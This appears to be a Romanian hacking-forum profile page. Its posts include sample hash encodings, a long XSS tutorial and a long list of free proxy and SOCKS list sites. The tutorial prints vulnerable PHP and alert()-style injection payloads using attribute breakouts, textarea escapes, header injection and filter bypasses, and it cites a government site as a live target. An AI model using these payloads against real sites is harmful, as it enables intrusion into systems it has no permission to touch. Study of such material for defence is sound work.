Aici sunt cateva colectate. MD4 - a4a4a963e47c7b8a3b355e0e0c90daa0 MD5_APR - $apr1$$qjtLUZpoiD4RwXIYf4qVb0 MD5_Unix - $1$$I2o9Z7NcvQAKp7wyCTlia0 MD5_128bit - e2980b2f25ffaa96e53f71b5f5706e15 Base64 - 1f344CBiYXNlNjQNCj== MySQL - 5d2e19393cc5ef67 MySQL5 - 2470c0c06dee42fd1618bb99005adca2ec9d1e19 Mscash - 166a9e32f11580c1c0b62f9cd0bda633 Sha-1 - 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 Sha-1_Base64 - W6ph5Mm5Pz8GgiULbPgzG37mj9g= Hex -D5FDF8E0204865780D0A Html - %D5%FD%F8%E0+html%0D%0A Html_full - %D5%FD%F8%E0%20%68%74%6D%6C%0D%0A RSA Z Encoding - 6666Z0DZ0A
-
dar de noul program ( Betoniera ) care tripleaza suma + cazare, nai auzit Mathrex ? Pacat ieri am mai auzit aceeasi poveste pe chat, dubleaza suma fara risc, azi alt miracol, fratilor chiar credeti ca tot ce zboara se pune pe gratar ...
-
Nu ne limitam sa gasim xss ca de obicei cu tipicul script <script>alert("XSS")</script> Una dintre cele mai comune vulneranbilitati in ziua de azi foarte periculoasa ca toate este ca daca sti sa te folosesti de ele, poti face orice vrei.. Cazu 1 orice vulnerabilitate este limitata atata cat vrei tu.. incepand cu Cookies pana la un deface, doar iti trebuie 2 lucrurii esentiale, 1) mentalitate 2) imaginatie dupa aia limita e cerul.. unu din cazurile cele mai comune codul vulnerabil : <html> <head> <title> Formular de cautare </ title> </ head> <body> <center> <? if (isset ($ _POST [Text])) { $ XSS = $ _POST [text]; dor "name = \" XSS \ "metoda = \" POST \ "> <form <h1> 0 rezultate </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "$ XSS \ "name = \" text \ "> <br> <input type=\"submit\" value=\"Cautare\"> </ form> "; } else { echo "<forma nume = \ "XSS \" metoda = \ "POST \"> <h1> Formular de c?utare </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "\" name = \ " textul \ "> <br> <input type=\"submit\" value=\"Cautare\"> </form>"; } ?> </ center> </ body> </ html> Cum vedem in source daca cautam ceva, orice cautam ramane in from asta e usor scriem “>Becali– "><script>alert("XSS")</script> ceea ce e logic ca ar ramane asa <input type=”text” value=””> Cazu 2 : Limitarea in anumite caractere / Campuri de text limitate un alt caz foarte comun va las aici minunea http://www.gov.ro/ Nu se putea adauga nimic in from ceva de genu : “>$#-|/()=\*¿?[/CODE nici un caracter special, cautand simplu cuvant (buna) rezultatul a fost acesta [CODE]resultatgeneral.jsp?cuvantul=buna&servici=0 asa ca am facut in felul urmator, http://url/resultatgeneral.jsp?cuvant=”><script>alert(/OK/)</script>&servici=0[b] Bingo [/b] asta se poate face cu TAMPER DATA (ADDON De Firefox). modificarea continutului ce se trimite prin post cazu 3 Textarea <textarea style="width:320px; height:120px" name=message></textarea> cum se poate vedea cu un simplu "> nu merge bypass daca introducem un text va arata asa <textarea style="width:320px; height:120px" name=message>Mensaje </textarea> </textarea><script>alert(/PWNED/)</script> ar ramane asa : <textarea style="width:320px; height:120px" name=message> </textarea> <script>alert(/PWNED/)</script> </textarea> Headers Astai foarte interesanta ne jucam cu Headers sa scoatem un xss 1 – User Agent Source: <?php $nav = $_SERVER['HTTP_USER_AGENT']; echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>"; ?> Header: Host: localhost User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive si daca al modificam: Host: localhost User-Agent: numi aduc aminte de nume :$ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Y … User-Agent: <script>alert(/Yeah/)</script> 2 – Referer Header: host : Ce IP am? Care este IP-ul meu? User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.google.com.do/ Cookie: ****** si daca al modificam : host : Ce IP am? Care este IP-ul meu? User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: <script>alert(/Yeah/)</script> Cookie: ****** 3 - X-Forwarded-For host : Ce IP am? Care este IP-ul meu? User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.google.com/ X-Forwarded-For: 127.0.0.1 Cookie: ****** fiind 127.0.0.1 IP A Spoofear. asta ne da ca output la IP in cazul acesta ar fii 127.0.0.1 host : Host: ********* User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://google.com X-Forwarded-For: <script>alert(/Yeah/)</script> Cookie: ****** e la fel ca un xss STR_Replace ce sa faceti daca gasitii un script pentru xss <?php if(isset($_GET[xss])){ $xss = $_GET['xss']; $xss2 = str_replace("<script>", "", $xss); $xss3 = str_replace("alert", "", $xss2); echo "<form name=\"Hi\"> <input type=\"text\" value=\"$xss3\" size=\"30\"> </form>"; } ?> daca intentam sa punem <script>alert(Yeah)</script> .. ar ramane asa alert(Yeah)</script> si pentru asta nu se produce alert dar incercam sa ajungem mai incolo cum vedem in source si cautam ( aaaa) astai rezultatul <input type="text" value="aaa" size="30"> parea ceva simplu de “><script>alert(WTF)</script> dar nu putem folosi script asa ca doar ne ramane sa ne gandim scriptul este complet vulnerabil codurile se imprima asa cum ajung doar excuind <script> aici o sa folosim javascript http://www.w3schools.com/js/js_events.asp). folosim : onblur introducem : Onblur=alert(000) nu se produce alerta ramane inauntru in from si pentru asta daca introducem bufnita ar fi asa <input type="text" value="" bufnita size=”30”> asa ca valoarea de from, ar fi nula “ Onblur=alert(666) “ <input type="text" value="" “ Onblur=alert(666) “ size=”30”> in acest caz am adauga o proprietate de avent in input provocand un xss !! Bafta...
-
Opera.com a fost spart si utilizatorii au primit o actualizare infectata
io.kent replied to Matt's topic in Stiri securitate
Eu foloses betoniera, merge mai greu, dar e sigura in schimb aurora imi place, pana si numele folosesc si chrome, si ie, dar opera deloc.. -
Tot se cer proxy, aveti aici tot ce va trebuie socks, proxy.. [B]http://aliveproxies.com/ http://aliveproxies.com/ipproxy/page/1/ http://aliveproxies.com/ipproxy/page/10/ http://aliveproxies.com/ipproxy/page/11/ http://aliveproxies.com/ipproxy/page/12/ http://aliveproxies.com/ipproxy/page/13/ http://aliveproxies.com/ipproxy/page/14/ http://aliveproxies.com/ipproxy/page/15/ http://aliveproxies.com/ipproxy/page/16/ http://aliveproxies.com/ipproxy/page/17/ http://aliveproxies.com/ipproxy/page/18/ http://aliveproxies.com/ipproxy/page/19/ http://aliveproxies.com/ipproxy/page/2/ http://aliveproxies.com/ipproxy/page/20/ http://aliveproxies.com/ipproxy/page/21/ http://aliveproxies.com/ipproxy/page/22/ http://aliveproxies.com/ipproxy/page/23/ http://aliveproxies.com/ipproxy/page/24/ http://aliveproxies.com/ipproxy/page/25/ http://aliveproxies.com/ipproxy/page/26/ http://aliveproxies.com/ipproxy/page/27/ http://aliveproxies.com/ipproxy/page/28/ http://aliveproxies.com/ipproxy/page/29/ http://aliveproxies.com/ipproxy/page/3/ http://aliveproxies.com/ipproxy/page/30/ http://aliveproxies.com/ipproxy/page/31/ http://aliveproxies.com/ipproxy/page/32/ http://aliveproxies.com/ipproxy/page/33/ http://aliveproxies.com/ipproxy/page/34/ http://aliveproxies.com/ipproxy/page/35/ http://aliveproxies.com/ipproxy/page/36/ http://aliveproxies.com/ipproxy/page/37/ http://aliveproxies.com/ipproxy/page/38/ http://aliveproxies.com/ipproxy/page/39/ http://aliveproxies.com/ipproxy/page/4/ http://aliveproxies.com/ipproxy/page/40/ http://aliveproxies.com/ipproxy/page/41/ http://aliveproxies.com/ipproxy/page/42/ http://aliveproxies.com/ipproxy/page/43/ http://aliveproxies.com/ipproxy/page/44/ http://aliveproxies.com/ipproxy/page/45/ http://aliveproxies.com/ipproxy/page/46/ http://aliveproxies.com/ipproxy/page/47/ http://aliveproxies.com/ipproxy/page/48/ http://aliveproxies.com/ipproxy/page/49/ http://aliveproxies.com/ipproxy/page/5/ http://aliveproxies.com/ipproxy/page/50/ http://aliveproxies.com/ipproxy/page/51/ http://aliveproxies.com/ipproxy/page/52/ http://aliveproxies.com/ipproxy/page/53/ http://aliveproxies.com/ipproxy/page/54/ http://aliveproxies.com/ipproxy/page/55/ http://aliveproxies.com/ipproxy/page/56/ http://aliveproxies.com/ipproxy/page/57/ http://aliveproxies.com/ipproxy/page/58/ http://aliveproxies.com/ipproxy/page/59/ http://aliveproxies.com/ipproxy/page/6/ http://aliveproxies.com/ipproxy/page/60/ http://aliveproxies.com/ipproxy/page/61/ http://aliveproxies.com/ipproxy/page/62/ http://aliveproxies.com/ipproxy/page/63/ http://aliveproxies.com/ipproxy/page/64/ http://aliveproxies.com/ipproxy/page/65/ http://aliveproxies.com/ipproxy/page/66/ http://aliveproxies.com/ipproxy/page/67/ http://aliveproxies.com/ipproxy/page/68/ http://aliveproxies.com/ipproxy/page/69/ http://aliveproxies.com/ipproxy/page/7/ http://aliveproxies.com/ipproxy/page/70/ http://aliveproxies.com/ipproxy/page/71/ http://aliveproxies.com/ipproxy/page/72/ http://aliveproxies.com/ipproxy/page/73/ http://aliveproxies.com/ipproxy/page/74/ http://aliveproxies.com/ipproxy/page/75/ http://aliveproxies.com/ipproxy/page/76/ http://aliveproxies.com/ipproxy/page/77/ http://aliveproxies.com/ipproxy/page/78/ http://aliveproxies.com/ipproxy/page/79/ http://aliveproxies.com/ipproxy/page/8/ http://aliveproxies.com/ipproxy/page/80/ http://aliveproxies.com/ipproxy/page/81/ http://aliveproxies.com/ipproxy/page/82/ http://aliveproxies.com/ipproxy/page/83/ http://aliveproxies.com/ipproxy/page/84/ http://aliveproxies.com/ipproxy/page/85/ http://aliveproxies.com/ipproxy/page/9/ http://aliveproxy.com/socks4-list/ http://aliveproxy.com/socks5-list/ http://anhlc.free.fr/?q=proxy http://antipalivo.ru/proxy/list http://atomintersoft.com/anonymous_proxy_list http://atomintersoft.com/high_anonymity_elite_proxy_list http://atomintersoft.com/transparent_proxy_list http://best-proxy.ru/ http://bestproxy.info//argentina_proxy http://bestproxy.info//australia_proxy http://bestproxy.info//austria_proxy http://bestproxy.info//belgium_proxy http://bestproxy.info//brazil_proxy http://bestproxy.info//canada_proxy http://bestproxy.info//china_proxy http://bestproxy.info//denmark_proxy http://bestproxy.info//ecuador_proxy http://bestproxy.info//finland_proxy http://bestproxy.info//france_proxy http://bestproxy.info//germany_proxy http://bestproxy.info//greece_proxy http://bestproxy.info//hongkong_proxy http://bestproxy.info//iceland_proxy http://bestproxy.info//india_proxy http://bestproxy.info//indonesia_proxy http://bestproxy.info//iran_proxy http://bestproxy.info//ireland_proxy http://bestproxy.info//israel_proxy http://bestproxy.info//italy_proxy http://bestproxy.info//japan_proxy http://bestproxy.info//jordan_proxy http://bestproxy.info//korea_proxy http://bestproxy.info//kuwait_proxy http://bestproxy.info//latvia_proxy http://bestproxy.info//lithuana_proxy http://bestproxy.info//malta_proxy http://bestproxy.info//mexico_proxy http://bestproxy.info//netherlands_proxy http://bestproxy.info//newzealand_proxy http://bestproxy.info//poland_proxy http://bestproxy.info//portugal_proxy http://bestproxy.info//romania_proxy http://bestproxy.info//rsa_proxy http://bestproxy.info//russia_proxy http://bestproxy.info//saudi_arabia_proxy http://bestproxy.info//slovenia_proxy http://bestproxy.info//spain_proxy http://bestproxy.info//sudan_proxy http://bestproxy.info//sweden_proxy http://bestproxy.info//switzerland_proxy http://bestproxy.info//taiwan_proxy http://bestproxy.info//tanzania_proxy http://bestproxy.info//thailand_proxy http://bestproxy.info//turkey_proxy http://bestproxy.info//ukraine_proxy http://bestproxy.info//united_kingdom_proxy http://bestproxy.info//uruguay_proxy http://bestproxy.info//usa_anonymous_proxy http://bestproxy.info//usa_elite_proxy http://bestproxy.info//usa_transparent_proxy http://bestproxy.info//uzbekistan_proxy http://bestproxy.info//vietnam_proxy http://bestproxy.info//wenezuela_proxy http://bestproxy.info//zimbabwe_proxy http://bitsock.blogspot.com/ http://community.aliveproxy.com/ http://community.aliveproxy.com/forums/8.aspx http://community.aliveproxy.com/forums/9.aspx http://community.aliveproxy.com/forums/default.aspx?GroupID=6 http://community.aliveproxy.com/forums/p/3050/3244.aspx http://community.aliveproxy.com/forums/p/777/896.aspx http://comp-info.ru/proxy/ http://cpunerd.blogspot.com/ http://*************.com/proxy-lists-wordlists/?prefixid=12 http://elite-proxies.blogspot.com/ http://elite-proxies.blogspot.com/search/label/Anonymous%20Live%20Proxies http://elite-proxies.blogspot.com/search/label/Anonymous%20US%20Proxies http://elite-proxies.blogspot.com/search/label/L1%20Elite%20Country%20Sorted http://elite-proxies.blogspot.com/search/label/L2%20Anonymous%20Country%20Sorted http://elite-proxies.blogspot.com/search/label/Speed%20L1%20Elite%20Proxies http://eliteproxy.blogspot.com/ http://eliteproxys.blogspot.com/ http://en.proxy.net.pl/fresh.html http://en.proxy.net.pl/proxy1.html http://en.proxy.net.pl/proxy2.html http://en.proxy.net.pl/proxy3.html http://en.proxy.net.pl/proxy4.html http://en.proxy.net.pl/proxy5.html http://en.proxy.net.pl/proxy6.html http://en.proxy.net.pl/proxy7.html http://ffproxies.blogspot.com/ http://findproxy.org/ http://forum.my-proxy.com/anonymous-proxies/ http://forum.my-proxy.com/high-anonymous-proxies/ http://forum.my-proxy.com/index.php/board,15.0.html|topic http://forum.my-proxy.com/index.php/board,5.0.html|topic http://forum.my-proxy.com/index.php/board,6.0.html|topic http://forum.my-proxy.com/index.php/board,7.0.html|topic http://forum.my-proxy.com/socks-proxies/ http://free-proxy-server-list.blogspot.com/ http://free-proxy-sock5.leadervpn.com/ http://freeproxies.us/?cat=3 http://freeproxy.ru/download/lists/goodproxy.txt http://freeproxylist.free-webmaster-resources.org/category/anonymous-proxy-list/ http://freeproxylist.free-webmaster-resources.org/category/high-anonymous-proxy/ http://freeproxylist.free-webmaster-resources.org/tag/free-daily-socks45-proxy-list/ http://freeproxylists.co http://freetao.org/socks/index.php?act=list&port=&type=&country=&page=1 http://freetao.org/socks/index.php?act=list&port=&type=&country=&page=2 http://fresh-proxies.blogspot.com/ http://globalproxies.blogspot.com/ http://goldsocks.blogspot.com/ http://hackingballz.com/proxys/ http://highsocks.blogspot.com/ http://hisocks.blogspot.com/ http://joojehacker6.blogspot.com/ http://linuxland.itam.nsc.ru/proxy.html http://listproxy.blogspot.com/ http://mboedick.org/miscellany/anonymous_proxies http://megasocks.blogspot.com/ http://movies.yahoo.com/movie/1808643731/user http://multiproxy.org/txt_anon/proxy.txt http://naawy.com/index.php?view=proxy_main&type=socks5&country=all&state=all&city=all&page=1 http://netzoom.ru/node/8/ http://netzoom.ru/view/8/ http://new-fresh-proxies.blogspot.com/ http://newdailyproxies.blogspot.com/ http://nntime.com/ http://nntime.com/proxy-list-01.htm http://nntime.com/proxy-list-02.htm http://nntime.com/proxy-list-03.htm http://nntime.com/proxy-list-04.htm http://nntime.com/proxy-list-05.htm http://nntime.com/proxy-list-06.htm http://nntime.com/proxy-list-07.htm http://nntime.com/proxy-list-08.htm http://nntime.com/proxy-list-09.htm http://nntime.com/proxy-list-10.htm http://nntime.com/proxy-list-11.htm http://nntime.com/proxy-list-12.htm http://nntime.com/proxy-list-13.htm http://nntime.com/proxy-list-14.htm http://nntime.com/proxy-list-15.htm http://nntime.com/proxy-list-16.htm http://nntime.com/proxy-list-17.htm http://nntime.com/proxy-list-18.htm http://nntime.com/proxy-list-19.htm http://nntime.com/proxy-list-20.htm http://nntime.com/proxy-list-21.htm http://nntime.com/proxy-list-22.htm http://nntime.com/proxy-list-23.htm http://nntime.com/proxy-list-24.htm http://nntime.com/proxy-list-25.htm http://nntime.com/socks http://pakistan43.blogspot.com/ http://pasokoma.jp/etc/file/170924.txt http://pr0xies.org http://proxies.my-proxy.com/ http://proxies.my-proxy.com/proxy-list-10.html http://proxies.my-proxy.com/proxy-list-2.html http://proxies.my-proxy.com/proxy-list-3.html http://proxies.my-proxy.com/proxy-list-4.html http://proxies.my-proxy.com/proxy-list-5.html http://proxies.my-proxy.com/proxy-list-6.html http://proxies.my-proxy.com/proxy-list-7.html http://proxies.my-proxy.com/proxy-list-8.html http://proxies.my-proxy.com/proxy-list-9.html http://proxies.my-proxy.com/proxy-list-s1.html http://proxies.my-proxy.com/proxy-list-s2.html http://proxies.my-proxy.com/proxy-list-s3.html http://proxies.my-proxy.com/proxy-list-socks4.html http://proxies.my-proxy.com/proxy-list-socks5.html http://proxy-faq.de/3128.html http://proxy-faq.de/80.html http://proxy-faq.de/8080.htm http://proxy-heaven.blogspot.com/ http://proxy-heaven.blogspot.com/search/label/L1%2FL2%20Anonymous%20Proxies http://proxy-heaven.blogspot.com/search/label/Turbo%20L1%20Elite%20Proxies http://proxy-heaven.blogspot.ro/ http://proxy-hunter.blogspot.com/ http://proxy-hunter.blogspot.com/feeds/posts/default http://proxy-ip-list.com/fresh-proxy-list.html http://proxy.ipcn.org/proxya.html http://proxy.ipcn.org/proxya2.html http://proxy.ipcn.org/proxyb.html http://proxy.ipcn.org/proxyb2.html http://proxy.ipcn.org/proxyc.html http://proxy.ipcn.org/proxyc2.html http://proxy.ipcn.org/proxylist2.html http://proxy.org/ http://proxy.speedtest.at/proxybyActuality.php?offset=0 http://proxy.speedtest.at/proxybyActuality.php?offset=0|proxybyActuality.php?offset=|0 http://proxy.speedtest.at/proxybyActuality.php?offset=100 http://proxy.speedtest.at/proxybyActuality.php?offset=125 http://proxy.speedtest.at/proxybyActuality.php?offset=150 http://proxy.speedtest.at/proxybyActuality.php?offset=175 http://proxy.speedtest.at/proxybyActuality.php?offset=200 http://proxy.speedtest.at/proxybyActuality.php?offset=225 http://proxy.speedtest.at/proxybyActuality.php?offset=25 http://proxy.speedtest.at/proxybyActuality.php?offset=250 http://proxy.speedtest.at/proxybyActuality.php?offset=275 http://proxy.speedtest.at/proxybyActuality.php?offset=300 http://proxy.speedtest.at/proxybyActuality.php?offset=325 http://proxy.speedtest.at/proxybyActuality.php?offset=350 http://proxy.speedtest.at/proxybyActuality.php?offset=375 http://proxy.speedtest.at/proxybyActuality.php?offset=400 http://proxy.speedtest.at/proxybyActuality.php?offset=425 http://proxy.speedtest.at/proxybyActuality.php?offset=450 http://proxy.speedtest.at/proxybyActuality.php?offset=475 http://proxy.speedtest.at/proxybyActuality.php?offset=50 http://proxy.speedtest.at/proxybyActuality.php?offset=500 http://proxy.speedtest.at/proxybyActuality.php?offset=525 http://proxy.speedtest.at/proxybyActuality.php?offset=550 http://proxy.speedtest.at/proxybyActuality.php?offset=575 http://proxy.speedtest.at/proxybyActuality.php?offset=75 http://proxy.speedtest.at/proxybyCountry.php?offset=100 http://proxy.speedtest.at/proxybyCountry.php?offset=125 http://proxy.speedtest.at/proxybyCountry.php?offset=200 http://proxy.speedtest.at/proxybyCountry.php?offset=250 http://proxy.speedtest.at/proxybyCountry.php?offset=275 http://proxy.speedtest.at/proxybyCountry.php?offset=375 http://proxy.speedtest.at/proxybyPerformance.php?offset=100 http://proxy.speedtest.at/proxybyPerformance.php?offset=175 http://proxy.speedtest.at/proxybyPerformance.php?offset=575 http://proxy.speedtest.at/proxyOnlyAnonymous.php?offset=0 http://proxy.speedtest.at/proxyOnlyAnonymous.php?offset=0|proxyOnlyAnonymous.php?offset=|0 http://proxy.speedtest.at/proxyOnlyAnonymous.php?offset=175 http://proxy.speedtest.at/proxyOnlyAnonymous.php?offset=25 http://proxy.speedtest.at/proxyOnlyAnonymous.php?offset=300 http://proxy.speedtest.at/proxyOnlyAnonymous.php?offset=50 http://proxy.speedtest.at/proxyOnlyTransparent.php?offset=0|proxyOnlyTransparent.php?offset=|0 http://proxy.wow.ag/proxybyActuality.php?offset=0 http://proxy.wow.ag/proxybyActuality.php?offset=100 http://proxy.wow.ag/proxybyActuality.php?offset=125 http://proxy.wow.ag/proxybyActuality.php?offset=150 http://proxy.wow.ag/proxybyActuality.php?offset=175 http://proxy.wow.ag/proxybyActuality.php?offset=200 http://proxy.wow.ag/proxybyActuality.php?offset=225 http://proxy.wow.ag/proxybyActuality.php?offset=25 http://proxy.wow.ag/proxybyActuality.php?offset=250 http://proxy.wow.ag/proxybyActuality.php?offset=275 http://proxy.wow.ag/proxybyActuality.php?offset=300 http://proxy.wow.ag/proxybyActuality.php?offset=325 http://proxy.wow.ag/proxybyActuality.php?offset=350 http://proxy.wow.ag/proxybyActuality.php?offset=375 http://proxy.wow.ag/proxybyActuality.php?offset=400 http://proxy.wow.ag/proxybyActuality.php?offset=425 http://proxy.wow.ag/proxybyActuality.php?offset=450 http://proxy.wow.ag/proxybyActuality.php?offset=475 http://proxy.wow.ag/proxybyActuality.php?offset=50 http://proxy.wow.ag/proxybyActuality.php?offset=500 http://proxy.wow.ag/proxybyActuality.php?offset=525 http://proxy.wow.ag/proxybyActuality.php?offset=550 http://proxy.wow.ag/proxybyActuality.php?offset=575 http://proxy.wow.ag/proxybyActuality.php?offset=75 http://proxy.wow.ag/proxybyPerformance.php?offset=150 http://proxy.wow.ag/proxyOnlyAnonymous.php?offset=0 http://proxy.wow.ag/proxyOnlyAnonymous.php?offset=100 http://proxy.wow.ag/proxyOnlyAnonymous.php?offset=125 http://proxy.wow.ag/proxyOnlyAnonymous.php?offset=275 http://proxylist.j1f.net/ http://proxylist.j1f.net/socks4.html http://proxylist.j1f.net/socks5.html http://proxylist.sakura.ne.jp/index.htm?pages=0 http://proxylist.sakura.ne.jp/index.htm?pages=1 http://proxylist.sakura.ne.jp/index.htm?pages=10 http://proxylist.sakura.ne.jp/index.htm?pages=11 http://proxylist.sakura.ne.jp/index.htm?pages=12 http://proxylist.sakura.ne.jp/index.htm?pages=2 http://proxylist.sakura.ne.jp/index.htm?pages=3 http://proxylist.sakura.ne.jp/index.htm?pages=4 http://proxylist.sakura.ne.jp/index.htm?pages=5 http://proxylist.sakura.ne.jp/index.htm?pages=6 http://proxylist.sakura.ne.jp/index.htm?pages=7 http://proxylist.sakura.ne.jp/index.htm?pages=8 http://proxylist.sakura.ne.jp/index.htm?pages=9 http://proxylists.net/http.txt http://proxylists.net/http_highanon.txt http://proxyserverlist.blogspot.com/ http://proxyworld.us/ http://proxyz.net/index.php?menu=anonproxys http://proxyz.net/index.php?menu=anonproxys|page|0 http://public-proxy.blogspot.com/ http://scrapeboxproxies.net http://sellsocks.blogspot.com/ http://sexy-proxies.blogspot.com/ http://sock.kteen.net/ http://socks-proxy-list.blogspot.com/ http://socks-world.blogspot.com/ http://socks.mocua.com/ http://socks24.blogspot.com http://socks24.org/ http://socks5list.com http://socks5proxylist.blogspot.com/ http://socksandproxy.blogspot.com/ http://sockslist.net/proxy/server-socks-hide-ip-address#proxylist http://sockslist.net/proxy/server-socks-hide-ip-address/2#proxylist http://sockslist.net/proxy/server-socks-hide-ip-address/3#proxylist http://socksus.blogspot.com/ http://spys.ru/en/socks-proxy-list/ http://spys.ru/en/socks-proxy-list/2/ http://spys.ru/en/socks-proxy-list/3 http://spys.ru/en/socks-proxy-list/4/ http://ssl-proxy-server.blogspot.com/ http://susanin.nm.ru/ http://teamxpc.com/index.php?/forum/36-checked-anons/ http://traffic.uwbcomm.com/proxy/proxylist.asp http://w3privacy.com/free_anonymous_proxy.html http://wapland.org/proxy/proxy.txt http://web.freerk.com/proxylist.htm http://www.6park.com/know1/messages/gvk14396.html http://www.aliveproxy.com/forum/index.php?showforum=4|showtopic|0 http://www.aliveproxy.com/forum/index.php?showforum=5|showtopic|0 http://www.aliveproxy.com/forum/index.php?showforum=6|showtopic|0 http://www.aliveproxy.com/proxy-list-pages/top/?p=8 http://www.aliveproxy.com/proxy-list/proxies.aspx/Vietnam-VN http://www.anonymitytest.com/Lists.shtml http://www.anonymousproxylists.net/FreshAnonymousProxyLists/Anonymous%20Proxy%20List.html http://www.anonymousproxylists.net/FreshAnonymousProxyLists/Anonymous%20Proxy%20Server%20List.html http://www.atomintersoft.com/anonymous_proxy_list http://www.atomintersoft.com/high_anonymity_elite_proxy_list http://www.atomintersoft.com/products/alive-proxy/proxy-list/ http://www.atomintersoft.com/products/alive-proxy/proxy-list/org/ http://www.blackhat.be/cpt/proxy.lst http://www.blackhatworld.com/blackhat-seo/f101-proxies/ http://www.blackhatworld.com/blackhat-seo/f103-proxy-lists/ http://www.checkedproxylists.com/ http://www.checkedproxylists.com/proxylists_full.html http://www.checkedproxylists.com/rss.xml http://www.cnproxy.com http://www.cnproxy.com/proxy1.html http://www.cnproxy.com/proxy10.html http://www.cnproxy.com/proxy2.html http://www.cnproxy.com/proxy3.html http://www.cnproxy.com/proxy4.html http://www.cnproxy.com/proxy5.html http://www.cnproxy.com/proxy6.html http://www.cnproxy.com/proxy7.html http://www.cnproxy.com/proxy8.html http://www.cnproxy.com/proxy9.html http://www.cnproxy.com/proxyedu1.html http://www.cnproxy.com/proxyedu2.html http://www.cool-proxy.net/index.php?action=anonymous-proxy-list http://www.cool-proxy.net/proxies/http_proxy_list http://www.cool-proxy.net/proxies/http_proxy_list/page:10 http://www.cool-proxy.net/proxies/http_proxy_list/page:11 http://www.cool-proxy.net/proxies/http_proxy_list/page:12 http://www.cool-proxy.net/proxies/http_proxy_list/page:13 http://www.cool-proxy.net/proxies/http_proxy_list/page:14 http://www.cool-proxy.net/proxies/http_proxy_list/page:15 http://www.cool-proxy.net/proxies/http_proxy_list/page:16 http://www.cool-proxy.net/proxies/http_proxy_list/page:17 http://www.cool-proxy.net/proxies/http_proxy_list/page:18 http://www.cool-proxy.net/proxies/http_proxy_list/page:19 http://www.cool-proxy.net/proxies/http_proxy_list/page:2 http://www.cool-proxy.net/proxies/http_proxy_list/page:20 http://www.cool-proxy.net/proxies/http_proxy_list/page:21 http://www.cool-proxy.net/proxies/http_proxy_list/page:22 http://www.cool-proxy.net/proxies/http_proxy_list/page:23 http://www.cool-proxy.net/proxies/http_proxy_list/page:24 http://www.cool-proxy.net/proxies/http_proxy_list/page:25 http://www.cool-proxy.net/proxies/http_proxy_list/page:26 http://www.cool-proxy.net/proxies/http_proxy_list/page:3 http://www.cool-proxy.net/proxies/http_proxy_list/page:4 http://www.cool-proxy.net/proxies/http_proxy_list/page:5 http://www.cool-proxy.net/proxies/http_proxy_list/page:6 http://www.cool-proxy.net/proxies/http_proxy_list/page:7 http://www.cool-proxy.net/proxies/http_proxy_list/page:8 http://www.cool-proxy.net/proxies/http_proxy_list/page:9 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:10 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:11 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:12 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:13 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:14 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:15 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:16 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:17 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:18 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:19 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:2 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:20 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:21 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:3 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:4 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:5 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:6 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:7 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:8 http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:9 http://www.cooleasy.com/ http://www.cooleasy.com/?act=list&port=&type=&country=&page=10 http://www.cooleasy.com/?act=list&port=&type=&country=&page=11 